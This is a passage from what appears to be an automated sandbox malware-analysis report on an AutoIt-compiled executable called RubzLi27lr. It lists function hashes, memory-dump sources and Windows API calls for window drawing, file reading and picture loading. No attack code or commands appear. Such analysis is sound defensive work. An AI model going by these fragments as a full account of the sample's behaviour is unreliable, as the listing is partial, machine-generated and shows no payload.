                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4e1ed224d9c73ec8d027e60f8307d5adcfd3fd5706500b29a81e582ced729234
                                                                                                                  • Instruction ID: f1581f80d345ef3572ed012cfb26798f318b2ffbffbf18f601700a30da9e8765
                                                                                                                  • Opcode Fuzzy Hash: 4e1ed224d9c73ec8d027e60f8307d5adcfd3fd5706500b29a81e582ced729234
                                                                                                                  • Instruction Fuzzy Hash: 9E323522D29F814DD7239635DC223396259AFB73C6F25D737E81AB69A5EF29C4C34100
                                                                                                                  Function 00ACCC39 Relevance: .6, Instructions: 635COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 218f90f85061d76d837fe81d4e533d7d3701c02d8b7f1901f5cdc74e1cf46c14
                                                                                                                  • Instruction ID: 3d99d18263d7db5a1c40ce56ab7facaac186dcd8e643d3b50f0767a5a6d71e2b
                                                                                                                  • Opcode Fuzzy Hash: 218f90f85061d76d837fe81d4e533d7d3701c02d8b7f1901f5cdc74e1cf46c14
                                                                                                                  • Instruction Fuzzy Hash: E232C032A041198BDF28CB29C4D4B7D7FE1EB45310F2986AAD89ADB2D5D730DD81EB41
                                                                                                                  Function 00AB7920 Relevance: .6, Instructions: 563COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f47d8ee2df525fcb670e96338c43dae440e6558a38a168b6a784a942471ac561
                                                                                                                  • Instruction ID: 5838f57ad635cd70711d7305c5ffc1da8204c6c5d5c391ba72186ee690a0172f
                                                                                                                  • Opcode Fuzzy Hash: f47d8ee2df525fcb670e96338c43dae440e6558a38a168b6a784a942471ac561
                                                                                                                  • Instruction Fuzzy Hash: CD229F70E046099FDF14CFA8C981AEEB7F6FF44300F244629E916AB292EB759D51CB50
                                                                                                                  Function 00AB91C0 Relevance: .5, Instructions: 475COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa0279a9d2cbdf1811650cc3d101f4a8f859c76d1474f7eded9c22db395b9f20
                                                                                                                  • Instruction ID: 9d3f884bb3a6b60f2faca6eeca7c38864270ca3b66ad0a0eb8aa24000cf2dbfb
                                                                                                                  • Opcode Fuzzy Hash: fa0279a9d2cbdf1811650cc3d101f4a8f859c76d1474f7eded9c22db395b9f20
                                                                                                                  • Instruction Fuzzy Hash: 7D02C6B0E00209EFDB04DF54D981BAEB7B5FF44340F118169F9169B2A1EB31AE61CB91
                                                                                                                  Function 00AE9EEE Relevance: .3, Instructions: 294COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4c511e203860bfa2a09e57ef8d179867c16c3977b83d3a536011cf817783de0
                                                                                                                  • Instruction ID: a06a39064ff8aa8f567355b2c856257f8266b11396d1393051cb03b3febc8ecc
                                                                                                                  • Opcode Fuzzy Hash: b4c511e203860bfa2a09e57ef8d179867c16c3977b83d3a536011cf817783de0
                                                                                                                  • Instruction Fuzzy Hash: 1FB1F120D2AF414DD32396398831336B69CAFBB6D6F91D75BFC1675E22EF2286834140
                                                                                                                  Function 00AD7A4A Relevance: .2, Instructions: 237COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8e96fc5bf80ae0f804020db4446745e2f1b34aa2a8994faa465bbcee7210f535
                                                                                                                  • Instruction ID: d4f14368d2e1225ce4bfbb3913bafea77e3eb3066f73a3b9cc2cb4d2c11ea098
                                                                                                                  • Opcode Fuzzy Hash: 8e96fc5bf80ae0f804020db4446745e2f1b34aa2a8994faa465bbcee7210f535
                                                                                                                  • Instruction Fuzzy Hash: 4461367160870996DB3C9B288DA6BBE73A4EF41740F64091BE883DB3A1FA15DE428355
                                                                                                                  Function 00AD7CA7 Relevance: .2, Instructions: 237COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 56e589815f369b21914beba8b6a1b4538df2859fcc408f75e0deb994701d4f60
                                                                                                                  • Instruction ID: 70054b5e0d9f8a952fec7f27f27a4fa430675ad54f41eed6efe42e69343921ee
                                                                                                                  • Opcode Fuzzy Hash: 56e589815f369b21914beba8b6a1b4538df2859fcc408f75e0deb994701d4f60
                                                                                                                  • Instruction Fuzzy Hash: 0761697160870957DE3C8B288956BBF73A6EF42704F10095BE9C3DB381FE16ED428A55
                                                                                                                  Function 0180F0E8 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction ID: 8dc29bc3b942230fc956dfe28b3d6b1872994032341240beddec1f77157412d8
                                                                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                  • Instruction Fuzzy Hash: 1C41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                                                  Function 00B22046 Relevance: .1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d47050a65c8d34009a33602296303826b3e89d022a75f895a14aaa488f5d54bf
                                                                                                                  • Instruction ID: 4af10b42ee49ea4a2f04c7ede36539d5b74a6cd8fbe7d7c2113d5bff9bb56049
                                                                                                                  • Opcode Fuzzy Hash: d47050a65c8d34009a33602296303826b3e89d022a75f895a14aaa488f5d54bf
                                                                                                                  • Instruction Fuzzy Hash: DE21B7326206118BD728CF79C82367E73E5E754310F15866EE4A7C77D0DE39A904CB80
                                                                                                                  Function 0180EFD8 Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction ID: 4dd7b211cbf0fe41914a22582ad9cd1652de28e0ff4014aac57d04ac38e4c6cf
                                                                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                  • Instruction Fuzzy Hash: 1A018078A01109EFCB95DF98C5909AEF7B5FB48310F208599E909A7341D731AE41DB80
                                                                                                                  Function 0180EF78 Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction ID: bd403ae0538f1316b86a447b846426307e2225a40814a14d843e99e77fc1b3e0
                                                                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                  • Instruction Fuzzy Hash: F0018078A0010DEFCB89DF98C5909AEF7B6FB48310F2085D9E819A7345D730AE41DB80
                                                                                                                  Function 0180D928 Relevance: .0, Instructions: 6COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                  Function 00B32ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B32B30
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B32B43
                                                                                                                  • DestroyWindow.USER32 ref: 00B32B52
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B32B6D
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B32B74
                                                                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B32CA3
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B32CB1
                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32CF8
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00B32D04
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B32D40
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D62
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D75
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D80
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00B32D89
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32D98
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B32DA1
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32DA8
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B32DB3
                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32DC5
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B4FC38,00000000), ref: 00B32DDB
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B32DEB
                                                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B32E11
                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B32E30
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B32E52
                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B3303F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                  • Opcode ID: defe7c3ab841723835d0d8ea138ef3805339ef00b920fe31866f428ad1539a4c
                                                                                                                  • Instruction ID: 6fd404f091f1e23fdbbdd3467bd15820f7d9a1cb002938d85e21f728aadf825c
                                                                                                                  • Opcode Fuzzy Hash: defe7c3ab841723835d0d8ea138ef3805339ef00b920fe31866f428ad1539a4c
                                                                                                                  • Instruction Fuzzy Hash: 6E028C75901204AFDB14DFA4CD89EAE7BB9FF49710F108558F916AB2A1DB70AE01CB60
                                                                                                                  Function 00B470D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00B4712F
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B47160
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00B4716C
                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00B47186
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B47195
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B471C0
                                                                                                                  • GetSysColor.USER32(00000010), ref: 00B471C8
                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00B471CF
                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00B471DE
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B471E5
                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00B47230
                                                                                                                  • FillRect.USER32(?,?,?), ref: 00B47262
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B47284
                                                                                                                    • Part of subcall function 00B473E8: GetSysColor.USER32(00000012), ref: 00B47421
                                                                                                                    • Part of subcall function 00B473E8: SetTextColor.GDI32(?,?), ref: 00B47425
                                                                                                                    • Part of subcall function 00B473E8: GetSysColorBrush.USER32(0000000F), ref: 00B4743B
                                                                                                                    • Part of subcall function 00B473E8: GetSysColor.USER32(0000000F), ref: 00B47446
                                                                                                                    • Part of subcall function 00B473E8: GetSysColor.USER32(00000011), ref: 00B47463
                                                                                                                    • Part of subcall function 00B473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B47471
                                                                                                                    • Part of subcall function 00B473E8: SelectObject.GDI32(?,00000000), ref: 00B47482
                                                                                                                    • Part of subcall function 00B473E8: SetBkColor.GDI32(?,00000000), ref: 00B4748B
                                                                                                                    • Part of subcall function 00B473E8: SelectObject.GDI32(?,?), ref: 00B47498
                                                                                                                    • Part of subcall function 00B473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00B474B7
                                                                                                                    • Part of subcall function 00B473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B474CE
                                                                                                                    • Part of subcall function 00B473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00B474DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4124339563-0
                                                                                                                  • Opcode ID: 3092de19c8bab2596eab7b3cd21b818cbf5e9a3fc7d9551c2b7f2167ea4f662c
                                                                                                                  • Instruction ID: ac5adcdd073166674171f89bd6decaf6c5ae494b8fc07e6ae9f1e726fde39070
                                                                                                                  • Opcode Fuzzy Hash: 3092de19c8bab2596eab7b3cd21b818cbf5e9a3fc7d9551c2b7f2167ea4f662c
                                                                                                                  • Instruction Fuzzy Hash: 5CA1A176009301BFD7509F60DC48E6B7BE9FB4A720F100A19F962A71E1DB70EA44DB52
                                                                                                                  Function 00B32711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00B3273E
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B3286A
                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B328A9
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B328B9
                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B32900
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00B3290C
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B32955
                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B32964
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00B32974
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00B32978
                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B32988
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B32991
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00B3299A
                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B329C6
                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B329DD
                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B32A1D
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B32A31
                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B32A42
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B32A77
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00B32A82
                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B32A8D
                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B32A97
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                  • Opcode ID: be966d20ac4279d6b4e690df91ce2db448eb28f5f705ef285f29487e04a43dca
                                                                                                                  • Instruction ID: 1bab72f88fefa2ac75c14c14b3ed00bd56115dcbdced1e8f7c614f3baf68fc73
                                                                                                                  • Opcode Fuzzy Hash: be966d20ac4279d6b4e690df91ce2db448eb28f5f705ef285f29487e04a43dca
                                                                                                                  • Instruction Fuzzy Hash: 18B16C75A01215BFEB14DFA8CC4AEAE7BB9FB08710F108554F915E72A1DB70AD00CBA4
